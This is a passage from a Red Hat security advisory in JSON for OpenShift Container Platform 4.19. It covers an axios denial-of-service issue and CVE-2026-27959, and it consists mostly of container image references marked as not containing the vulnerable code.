"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-27959",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2026-02-26T03:01:14.695334+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
